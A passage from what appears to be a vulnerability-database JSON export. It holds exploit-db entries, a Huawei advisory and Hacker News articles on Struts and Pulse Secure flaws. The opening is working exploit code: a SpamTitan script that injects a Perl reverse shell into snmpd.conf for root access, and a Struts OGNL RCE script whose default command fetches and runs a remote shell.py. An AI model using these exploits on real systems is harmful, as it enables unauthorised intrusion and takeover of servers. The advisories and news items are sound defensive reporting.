shell.\")\r\n\r\n return parser.parse_args()\r\n\r\ndef printmsg(msg,quiet=False,msgtype=\"i\"):\r\n if (not quiet):\r\n if (success):\r\n print(\"[%s] %s\" % (msgtype,msg))\r\n else:\r\n print(\"[-] %s\" % msg)\r\n\r\ndef info(msg,quiet=False):\r\n printmsg(msg,quiet,msgtype=\"i\")\r\n\r\ndef success(msg,quiet=False):\r\n printmsg(msg,quiet,msgtype=\"+\")\r\n\r\ndef fail(msg,quiet=False):\r\n printmsg(msg,quiet,msgtype=\"-\")\r\n\r\ndef myip():\r\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n try:\r\n # doesn't even have to be reachable\r\n s.connect(('10.255.255.255', 1))\r\n IP = s.getsockname()[0]\r\n except:\r\n IP = '127.0.0.1'\r\n finally:\r\n s.close()\r\n return IP\r\n\r\n\r\ndef shellServer(ip,port,quiet):\r\n servers = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n servers.bind((ip, port))\r\n servers.listen(1)\r\n info(\"Waiting for incoming connection on %s:%s\" % (ip,port))\r\n conn, addr = servers.accept()\r\n conn.settimeout(1)\r\n success(\"Hurray, we got a connection from %s\" % addr[0])\r\n\r\n prompt =conn.recv(128)\r\n prompt=str(prompt.decode(\"utf-8\")).strip()\r\n command = input(prompt)\r\n\r\n while True:\r\n try:\r\n c = \"%s\\n\" % (command)\r\n if (len(c)>0):\r\n conn.sendall(c.encode(\"utf-8\"))\r\n # Quit the console\r\n if command == 'exit':\r\n info(\"\\nClosing connection\")\r\n conn.close()\r\n break\r\n else:\r\n completeanswer=\"\"\r\n while True:\r\n answer=None\r\n try:\r\n answer=str((conn.recv(1024)).decode(\"utf-8\"))\r\n completeanswer+=answer\r\n except socket.timeout:\r\n completeanswer.strip()\r\n break\r\n print(completeanswer,end='')\r\n command = input(\"\")\r\n except (KeyboardInterrupt, EOFError):\r\n info(\"\\nClosing connection\")\r\n break\r\n\r\ndef triggerSNMPShell(target, community, triggeroid, port, quiet):\r\n if (not quiet):\r\n print(\"Waiting %s seconds to allow the main thread set-up the\r\nshell listener.\" % SNMPGETDELAY)\r\n # Give the parent thread a few seconds to set up the shell\r\nlistener before triggering the SNMP get query\r\n sleep(SNMPGETDELAY)\r\n if (not quiet):\r\n print(\"Querying the SNMP server to launch the shell.\")\r\n targetp = urlparse(target)\r\n errorIndication, errorStatus, errorIndex, varBinds = next(\r\n getCmd(SnmpEngine(),\r\n CommunityData(community, mpModel=0),\r\n UdpTransportTarget((targetp.netloc, port)),\r\n ContextData(),\r\n ObjectType(ObjectIdentity(triggeroid)))\r\n )\r\n if errorIndication:\r\n print(\"SNMP error: %s\" % errorIndication)\r\n elif errorStatus:\r\n print('SNMP error status: %s at %s' % (errorStatus.prettyPrint(),\r\n errorIndex and varBinds[int(errorIndex) -\r\n1][0] or '?'))\r\n\r\ndef main():\r\n (options,arguments) = parseoptions()\r\n q = options.quiet\r\n t = options.target\r\n i = options.ip\r\n p = options.port\r\n community=\"dummy\"\r\n\r\n if (t is None):\r\n print(\"[-] Error. Specify a target (-t).\")\r\n exit()\r\n\r\n if ((not \"http://\" in t) and (not \"https://\" in t)):\r\n t = \"http://%s/snmp-x.php\" % t\r\n else:\r\n t = \"%s/snmp-x.php\" % t\r\n\r\n if (not q):\r\n print(\"[+] Attacking: %s.\\nReceiving shell in %s:%s\" % (t,i,p))\r\n\r\n TARGETOID=\".1.3.6.1.4.1.8072.1.3.2.3.1.1.8.114.101.118.115.104.101.108.108\"\r\n # PAYLOAD=\"extend revshell /usr/bin/perl -e 'use\r\nSocket;$i=\\\"%s\\\";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh\r\n-i\\\");};'\" % (i,p)\r\n PAYLOAD=\"extend revshell /usr/bin/perl -e 'use\r\nSocket;$i=\\\"%s\\\";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh\r\n-i\\\");};'\" % (i,p)\r\n TOGGLESNMP={\r\n \"jaction\":\"toggleSNMP\",\r\n \"newval\":\"1\"\r\n }\r\n INJECTION={\r\n \"jaction\":\"saveAll\",\r\n \"contact\":\"CONTACT\",\r\n \"name\":\"SpamTitan\",\r\n \"location\":\"LOCATION\",\r\n # Add our IP as allowed to query the injected \"dummy\" community\r\n # Add also the perl payload in a new line (%0a) of the snmpd.conf file\r\n \"community\":'%s\" %s\\n%s # ' % (community,i,PAYLOAD)\r\n }\r\n\r\n rev_thread = threading.Thread(target=triggerSNMPShell, args=(t,\r\ncommunity, TARGETOID, 161,q))\r\n rev_thread.start()\r\n\r\n # Start a thread to listen for incoming reverse shells:\r\n if (not q):\r\n print(\"[+] Launching a reverse shell listener to wait for the shell.\")\r\n\r\n # Send the SNMP request to add a community and append an \"extend\"\r\ncommand to execute scripts\r\n # SpamTitan would add a new line in the snmpd.conf file with the\r\nnew community name and the \"extend\" script\r\n inj_res = requests.post(t,INJECTION,verify=False)\r\n if (inj_res.status_code == 200):\r\n if (not q):\r\n print(\"Spawning a reverse shell listener. Wait for it...\")\r\n shellServer(options.ip,int(options.port),options.quiet)\r\n else:\r\n print(\"Error. The target is probably not vulnerable (returned\r\na %s code).\" % inj_res.status_code)\r\n\r\nmain()\r\n\r\n---------------------------------------------\r\n\r\nIII. Impact\r\n~~~~~~~~~~~\r\n\r\nThe snmpd daemon is running as root in the target server. The\r\npressented PoC would return a root shell without need of any\r\nregistered user in the target server. There is total loss of\r\nconfidentiality, integrity and availability on the SpamTitan server.\r\n\r\nIV. Disclosure\r\n~~~~~~~~~~~~~~\r\n\r\nReported By: Felipe Molina de la Torre\r\n\r\nVendor Informed: 2020-04-17\r\nPatch Release Date: 2020-05-26\r\nAdvisory Release Date: 2019-09-18\r\n\r\nV. References\r\n~~~~~~~~~~~~~\r\n* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11698\r\n* https://sensepost.com/blog/2020/clash-of-the-spamtitan/\r\n\r\n---------------------------------[SPUK-2020-09/SpamTitan\r\nUnauthenticated Remote Code Execution in snmp-x.php]---", "sourceHref": "https://www.exploit-db.com/raw/48856", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-28T15:47:32", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-17T00:00:00", "type": "exploitdb", "title": "Apache Struts 2.5.20 - Double OGNL evaluation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-0230", "CVE-2019-0230", "CVE-2020-0230"], "modified": "2020-11-17T00:00:00", "id": "EDB-ID:49068", "href": "https://www.exploit-db.com/exploits/49068", "sourceData": "# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation\r\n# Date: 08/18/2020\r\n# Exploit Author: West Shepherd\r\n# Vendor Homepage: https://struts.apache.org/download.cgi\r\n# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059)\r\n# CVE : CVE-2019-0230\r\n# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF.\r\n# Source(s):\r\n# https://github.com/PrinceFPF/CVE-2019-0230\r\n# https://cwiki.apache.org/confluence/display/WW/S2-059\r\n# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22\r\n\r\n# !/usr/bin/python\r\nfrom sys import argv, exit, stdout, stderr\r\nimport argparse\r\nimport requests\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nimport logging\r\n\r\n\r\nclass Exploit:\r\n def __init__(\r\n self,\r\n target='',\r\n redirect=False,\r\n proxy_address=''\r\n ):\r\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n self.target = target\r\n self.session = requests.session()\r\n self.redirect = redirect\r\n self.timeout = 0.5\r\n self.proxies = {\r\n 'http': 'http://%s' % proxy_address,\r\n 'https': 'http://%s' % proxy_address\r\n } \\\r\n if proxy_address is not None \\\r\n and proxy_address != '' else {}\r\n self.query_params = {}\r\n self.form_values = {}\r\n self.cookies = {}\r\n boundary = \"---------------------------735323031399963166993862150\"\r\n self.headers = {\r\n 'Content-Type': 'multipart/form-data; boundary=%s' % boundary,\r\n 'Accept': '*/*',\r\n 'Connection': 'close'\r\n }\r\n payload = \"%{(#nike='multipart/form-data').\" \\\r\n \"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\" \\\r\n \"(#_memberAccess?(#_memberAccess=#dm):\" \\\r\n\r\n\"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\"\r\n\\\r\n\r\n\"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\"\r\n\\\r\n \"(#ognlUtil.getExcludedPackageNames().clear()).\" \\\r\n \"(#ognlUtil.getExcludedClasses().clear()).\" \\\r\n \"(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}').\" \\\r\n\r\n\"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).\"\r\n\\\r\n\r\n\"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).\" \\\r\n \"(#p=new\r\njava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).\" \\\r\n\r\n\"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().\"\r\n\\\r\n\r\n\"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).\"\r\n\\\r\n \"(#ros.flush())}\"\r\n\r\n self.payload = \"--%s\\r\\nContent-Disposition: form-data;\r\nname=\\\"foo\\\"; \" \\\r\n \"filename=\\\"%s\\0b\\\"\\r\\nContent-Type:\r\ntext/plain\\r\\n\\r\\nx\\r\\n--%s--\\r\\n\\r\\n\" % (\r\n boundary, payload, boundary\r\n )\r\n\r\n def do_get(self, url, params=None, data=None):\r\n return self.session.get(\r\n url=url,\r\n verify=False,\r\n allow_redirects=self.redirect,\r\n headers=self.headers,\r\n cookies=self.cookies,\r\n proxies=self.proxies,\r\n data=data,\r\n params=params\r\n )\r\n\r\n def do_post(self, url, data=None, params=None):\r\n return self.session.post(\r\n url=url,\r\n data=data,\r\n verify=False,\r\n allow_redirects=self.redirect,\r\n headers=self.headers,\r\n cookies=self.cookies,\r\n proxies=self.proxies,\r\n params=params\r\n )\r\n\r\n def debug(self):\r\n try:\r\n import http.client as http_client\r\n except ImportError:\r\n import httplib as http_client\r\n http_client.HTTPConnection.debuglevel = 1\r\n logging.basicConfig()\r\n logging.getLogger().setLevel(logging.DEBUG)\r\n requests_log = logging.getLogger(\"requests.packages.urllib3\")\r\n requests_log.setLevel(logging.DEBUG)\r\n requests_log.propagate = True\r\n return self\r\n\r\n def send_payload(self, command='curl --insecure -sv\r\nhttps://10.10.10.10/shell.py|python -'):\r\n url = self.target\r\n stdout.write('sending payload to %s payload %s' % (url, command))\r\n resp = self.do_post(url=url, params=self.query_params,\r\ndata=self.payload.replace('{COMMAND}', command))\r\n return resp\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(add_help=True,\r\n description='CVE-2020-0230 Struts\r\n2 exploit')\r\n try:\r\n parser.add_argument('-target', action='store', help='Target\r\naddress: http(s)://target.com/index.action')\r\n parser.add_argument('-command', action='store',\r\n help='Command to execute: touch /tmp/pwn')\r\n parser.add_argument('-debug', action='store', default=False,\r\nhelp='Enable debugging: False')\r\n parser.add_argument('-proxy', action='store', default='',\r\nhelp='Enable proxy: 10.10.10.10:8080')\r\n\r\n if len(argv) == 1:\r\n parser.print_help()\r\n exit(1)\r\n options = parser.parse_args()\r\n\r\n exp = Exploit(\r\n proxy_address=options.proxy,\r\n target=options.target\r\n )\r\n\r\n if options.debug:\r\n exp.debug()\r\n stdout.write('target %s debug %s proxy %s\\n' % (\r\n options.target, options.debug, options.proxy\r\n ))\r\n\r\n result = exp.send_payload(command=options.command)\r\n stdout.write('Response: %d\\n' % result.status_code)\r\n\r\n except Exception as error:\r\n\r\nstderr.write('error in main %s' % str(error))", "sourceHref": "https://www.exploit-db.com/raw/49068", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "huawei": [{"lastseen": "2023-06-13T14:27:00", "description": "The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to certain tags attributes such as id so it is possible to pass in a value that will be evaluated again when a tag's attributes will be rendered. With a carefully crafted request, this can lead to Remote Code Execution. The problem only applies when forcing OGNL evaluation inside a Struts tag attribute, when the expression to evaluate references raw, unvalidated input that an attacker is able to directly modify by crafting a corresponding request. (Vulnerability ID: HWPSIRT-2020-49789)\n\nThis vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2019-0230.\n\nHuawei has released software updates to fix this vulnerability. This advisory is available at the following link:\n\n[http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200902-01-struts2-en](<http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200902-01-struts2-en>)\n\n[](<http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200610-02-phone-en>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-02T00:00:00", "type": "huawei", "title": "Security Advisory - Remote Code Execution vulnerability in Apache Struts2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2021-02-10T00:00:00", "id": "HUAWEI-SA-20200902-01-STRUTS2", "href": "https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200902-01-struts2-en", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:15", "description": "[](<https://thehackernews.com/images/-RY_dyS_4TCQ/YRDt_NkuUVI/AAAAAAAADeQ/wS5GjyTOcHgamafaxl_uz3MdktJc_UMHACLcBGAsYHQ/s0/pulse-secure-vpn.jpg>)\n\nPulse Secure has shipped a fix for a critical post-authentication remote code execution (RCE) vulnerability in its Connect Secure virtual private network (VPN) appliances to address an incomplete patch for an actively exploited flaw it previously resolved in October 2020.\n\n\"The Pulse Connect Secure appliance suffers from an uncontrolled archive extraction vulnerability which allows an attacker to overwrite arbitrary files, resulting in Remote Code Execution as root,\" NCC Group's Richard Warren [disclosed](<https://research.nccgroup.com/2021/08/05/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-archive-extraction-cve-2021-22937-patch-bypass/>) on Friday. \"This vulnerability is a bypass of the patch for [CVE-2020-8260](<https://nvd.nist.gov/vuln/detail/CVE-2020-8260>).\"\n\n\"An attacker with such access will be able to circumvent any restrictions enforced via the web application, as well as remount the filesystem, allowing them to create a persistent backdoor, extract and decrypt credentials, compromise VPN clients, or pivot into the internal network,\" Warren added.\n\nThe disclosure comes days after Ivanti, the company behind Pulse Secure, [published an advisory](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858>) for as many as six security vulnerabilities on August 2, urging customers to move quickly to update to Pulse Connect Secure version 9.1R12 to secure against any exploitation attempts targeting the flaws.\n\nTracked as CVE-2021-22937 (CVSS score: 9.1), the shortcoming could \"allow an authenticated administrator to perform a file write via a maliciously crafted archive uploaded in the administrator web interface,\" according to Pulse Secure. CVE-2020-8260 (CVSS core: 7.2), which concerns an arbitrary code execution flaw using uncontrolled gzip extraction, was [remediated](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601>) in October 2020 with version 9.1R9.\n\n\"CVE-2021-2293 is a separate vulnerability and is not a bypass of CVE-2020-8260, but is similar in terms of impact and vulnerability type, which is why we assigned a separate CVE,\" Daniel Spicer, Invanti's vice president of security, said in a statement to The Hacker News.\n\nThe vulnerability is due to a flaw in the way that archive files (.TAR) are extracted in the administrator web interface. While further checks were added to validate the TAR file to prevent exploitation of CVE-2020-8260, additional variant and patch analysis revealed that it's possible to exploit the same extraction vulnerability in the part of the source code that handles profiler device databases, effectively getting around the mitigations put in place.\n\n\"Whilst this issue was patched by adding validation to extracted files, this validation does not apply to archives with the 'profiler' type,\" Warren said. \"Therefore, by simply modifying the original CVE-2020-8260 exploit to change the archive type to 'profiler', the patch can be bypassed, and code execution achieved.\"\n\nIt's worth noting that CVE-2020-8260 was one among the four Pulse Secure flaws that was [actively exploited by threat actors](<https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html>) earlier this April to stage a series of intrusions targeting defense, government, and financial entities in the U.S. and beyond in a bid to circumvent multi-factor authentication protections and breach enterprise networks. Given the possibility of real-world exploitation, it's highly recommended to upgrade to Pulse Connect Secure (PCS) 9.1R12, or later.\n\n\"A rigorous code review is just one of the steps we are taking to further bolster our security and protect our customers,\" Spicer [said](<https://blog.pulsesecure.net/improved-security-testing-procedures/>). \"For instance, we are also further expanding our existing internal product security resources to ramp up the pace and intensity of testing on existing products as well as those of companies or systems that we integrate into Ivanti.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-09T09:00:00", "type": "thn", "title": "Pulse Secure VPNs Get New Urgent Update for Poorly Patched Critical Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8260", "CVE-2021-2293", "CVE-2021-22937"], "modified": "2021-08-10T07:48:11", "id": "THN:9FB8DE3BF545932321335F2C525A4A36", "href": "https://thehackernews.com/2021/08/pulse-secure-vpns-get-new-urgent-update.html", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:19", "description": "[](<https://thehackernews.com/images/-HxsxXCBkPXE/YH-natH6OTI/AAAAAAAACUA/6_XHWg-Cu_YYS4p-8w6I8XWh3VRUU9ZMQCLcBGAsYHQ/s0/pulse-secure-hacking.jpg>)\n\nIf Pulse Connect Secure gateway is part of your organization network, you need to be aware of a newly discovered critical zero-day authentication bypass vulnerability (CVE-2021-22893) that is currently being exploited in the wild and for which there is no patch available yet.\n\nAt least two threat actors have been behind a series of intrusions targeting defense, government, and financial organizations in the U.S. and elsewhere by leveraging critical vulnerabilities in Pulse Secure VPN devices to circumvent multi-factor authentication protections and breach enterprise networks.\n\n\"A combination of prior vulnerabilities and a previously unknown vulnerability discovered in April 2021, [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), are responsible for the initial infection vector,\" cybersecurity firm FireEye [said](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>) on Tuesday, identifying 12 malware families associated with the exploitation of Pulse Secure VPN appliances.\n\nThe company is also tracking the activity under two threat clusters UNC2630 and UNC2717 (\"[UNC](<https://www.fireeye.com/blog/products-and-services/2020/12/how-mandiant-tracks-uncategorized-threat-actors.html>)\" for Uncategorized) \u2014 the former linked to a break-in of U.S. Defense Industrial base (DIB) networks, while the latter was found targeting a European organization in March 2021 \u2014 with the investigation attributing UNC2630 to operatives working on behalf of the Chinese government, in addition to suggesting possible ties to another espionage actor [APT5](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt5>) based on \"strong similarities to historic intrusions dating back to 2014 and 2015.\"\n\n[](<https://thehackernews.com/images/-_r1BkPmCUK8/YH-n1A6EuZI/AAAAAAAACUI/MS0JCaPy_hEkXJpAquULKRANPrKeNuL_gCLcBGAsYHQ/s728/vpn-hacking.jpg>)\n\nAttacks staged by UNC2630 are believed to have commenced as early as August 2020, before they expanded in October 2020, when UNC2717 began repurposing the same flaws to install custom malware on the networks of government agencies in Europe and the U.S. The incidents continued until March 2021, according to FireEye.\n\nThe list of malware families is as follows -\n\n * **UNC2630** \\- SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM, PACEMAKER, SLIGHTPULSE, and PULSECHECK\n * **UNC2717** \\- HARDPULSE, QUIETPULSE, AND PULSEJUMP\n\nTwo additional malware strains, STEADYPULSE and LOCKPICK, deployed during the intrusions have not been linked to a specific group, citing lack of evidence.\n\nBy exploiting multiple Pulse Secure VPN weaknesses ([CVE-2019-11510](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>), [CVE-2020-8260](<https://nvd.nist.gov/vuln/detail/CVE-2020-8260>), [CVE-2020-8243](<https://nvd.nist.gov/vuln/detail/CVE-2020-8243>), and CVE-2021-22893), UNC2630 is said to have harvested login credentials, using them to move laterally into the affected environments. In order to maintain persistence to the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts to enable arbitrary command execution and inject web shells capable of carrying out file operations and running malicious code.\n\nIvanti, the company behind the Pulse Secure VPN, has released [temporary mitigations](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) to address the arbitrary file execution vulnerability ([CVE-2021-22893](<https://kb.cert.org/vuls/id/213092>), CVSS score: 10), while a fix for the issue is expected to be in place by early May. The Utah-based company acknowledged that the new flaw impacted a \"[very limited number of customers](<https://blog.pulsesecure.net/pulse-connect-secure-security-update/>),\" adding it has released a [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) for customers to check for signs of compromise.\n\nPulse Secure customers are recommended to upgrade to PCS Server version 9.1R.11.4 when it becomes available.\n\nNews of compromises affecting government agencies, critical infrastructure entities, and other private sector organizations comes a week after the U.S. government [released an advisory](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>), warning businesses of active exploitation of five publicly known vulnerabilities by the Russian Foreign Intelligence Service (SVR), including CVE-2019-11510, to gain initial footholds into victim devices and networks.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-21T04:20:00", "type": "thn", "title": "WARNING: Hackers Exploit Unpatched Pulse Secure 0-Day to Breach Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893"], "modified": "2021-04-21T17:42:28", "id": "THN:AE2E46F59043F97BE70DB77C163186E6", "href": "https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:24", "description": "[](<https://thehackernews.com/images/-mNDlC0tKMKU/YSOiCQjKsfI/AAAAAAAADm0/8vxg1C4GweIrljnlPQrCj0yPLMYs18y_ACLcBGAsYHQ/s0/linux.jpg>)\n\nClose to 14 million Linux-based systems are directly exposed to the Internet, making them a lucrative target for an array of real-world attacks that could result in the deployment of malicious web shells, coin miners, ransomware, and other trojans.\n\nThat's according to an in-depth look at the Linux threat landscape published by U.S.-Japanese cybersecurity firm [Trend Micro](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/linux-threat-report-2021-1h-linux-threats-in-the-cloud-and-security-recommendations>), detailing the top threats and vulnerabilities affecting the operating system in the first half of 2021, based on data amassed from honeypots, sensors, and anonymized telemetry.\n\nThe company, which detected nearly 15 million malware events aimed at Linux-based cloud environments, found coin miners and ransomware to make up 54% of all malware, with web shells accounting for a 29% share.\n\nIn addition, by dissecting over 50 million events reported from 100,000 unique Linux hosts during the same time period, the researchers found 15 different security weaknesses that are known to be actively exploited in the wild or have a proof of concept (PoC) \u2014\n\n * [**CVE-2017-5638**](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>) (CVSS score: 10.0) - Apache Struts 2 remote code execution (RCE) vulnerability\n * [**CVE-2017-9805**](<https://nvd.nist.gov/vuln/detail/CVE-2017-9805>) (CVSS score: 8.1) - Apache Struts 2 REST plugin XStream RCE vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal Core RCE vulnerability\n * [**CVE-2020-14750**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14750>) (CVSS score: 9.8) - Oracle WebLogic Server RCE vulnerability\n * [**CVE-2020-25213**](<https://nvd.nist.gov/vuln/detail/CVE-2020-25213>) (CVSS score: 10.0) - WordPress File Manager (wp-file-manager) plugin RCE vulnerability\n * [**CVE-2020-17496**](<https://nvd.nist.gov/vuln/detail/CVE-2020-17496>) (CVSS score: 9.8) - vBulletin 'subwidgetConfig' unauthenticated RCE vulnerability\n * [**CVE-2020-11651**](<https://nvd.nist.gov/vuln/detail/CVE-2020-11651>) (CVSS score: 9.8) - SaltStack Salt authorization weakness vulnerability\n * [**CVE-2017-12611**](<https://nvd.nist.gov/vuln/detail/CVE-2017-12611>) (CVSS score: 9.8) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2017-7657**](<https://nvd.nist.gov/vuln/detail/CVE-2017-7657>) (CVSS score: 9.8) - Eclipse Jetty chunk length parsing integer overflow vulnerability\n * [**CVE-2021-29441**](<https://nvd.nist.gov/vuln/detail/CVE-2021-29441>) (CVSS score: 9.8) - Alibaba Nacos AuthFilter authentication bypass vulnerability\n * [**CVE-2020-14179**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14179>) (CVSS score: 5.3) - Atlassian Jira information disclosure vulnerability \n * [**CVE-2013-4547**](<https://nvd.nist.gov/vuln/detail/CVE-2013-4547>) (CVSS score: 8.0) - Nginx crafted URI string handling access restriction bypass vulnerability\n * 